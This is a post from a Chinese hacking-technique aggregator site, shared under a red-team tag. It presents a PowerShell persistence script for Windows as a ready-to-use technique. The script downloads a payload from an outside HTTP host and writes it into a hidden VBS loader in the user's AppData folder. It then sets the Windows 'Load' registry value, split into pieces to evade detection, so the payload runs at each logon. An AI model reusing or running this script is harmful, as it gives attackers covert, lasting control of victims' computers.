记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华
«未修补的新 Apple Safari 浏览器...
Linux shell 脚本检查服务进程... »

分享一个维权手法

2022-01-16 23:29
#>
#使用Unicorn生成已编码的powershell命令。修改注册表,当用户登录时执行payload
function Add-Persistence()
{
#payload的路径
$payloadurl = "http://192.168.125.106:8000/ghu98hjbs7jhj2"
  
#保存维权马的路径
$tmpdir = $env:APPDATA;
  
#vbs路径
$payloadvbsloaderpath = "$tmpdir\_log.vbs"
  
#下载payload
$payload = (New-Object Net.WebClient).DownloadString($payloadurl)
  
$vbs = "Set oShell = CreateObject( ""WScript.Shell"" )`r`n"
$vbs += "ps = ""$payload""`r`n"
$vbs += "oShell.run(ps),0,true"
$vbs | Out-File $payloadvbsloaderpath -Force
  
#隐藏文件
$fileObj = get-item $payloadvbsloaderpath -Force
$fileObj.Attributes = "Hidden"
  
#新建注册表
$HKCU1 = "HKCU:\"
$HKCU2 = "Software\Microsoft"
$HKCU3 = "\Windows NT\Current"
$HKCU4 = "Version\Windows"
$HKCU = $HKCU1 + $HKCU2 + $HKCU3 + $HKCU4
#操作注册表的值
Set-ItemProperty -Path $HKCU -Name LOAD -Value $payloadvbsloaderpath
  
}
Add-Persistence

来源 https://mp.weixin.qq.com/s/t98nGFycEqSytvqQTK2lNw


知识来源: https://www.moonsec.com/3382.html

阅读:149156 | 评论:0 | 标签:红队技术

想收藏或者和大家分享这篇好文章→复制链接地址

“分享一个维权手法”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

十年经营持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

🙇🧎¥由自富财,长成起一↓

随机推荐 🤖

标签云 ☁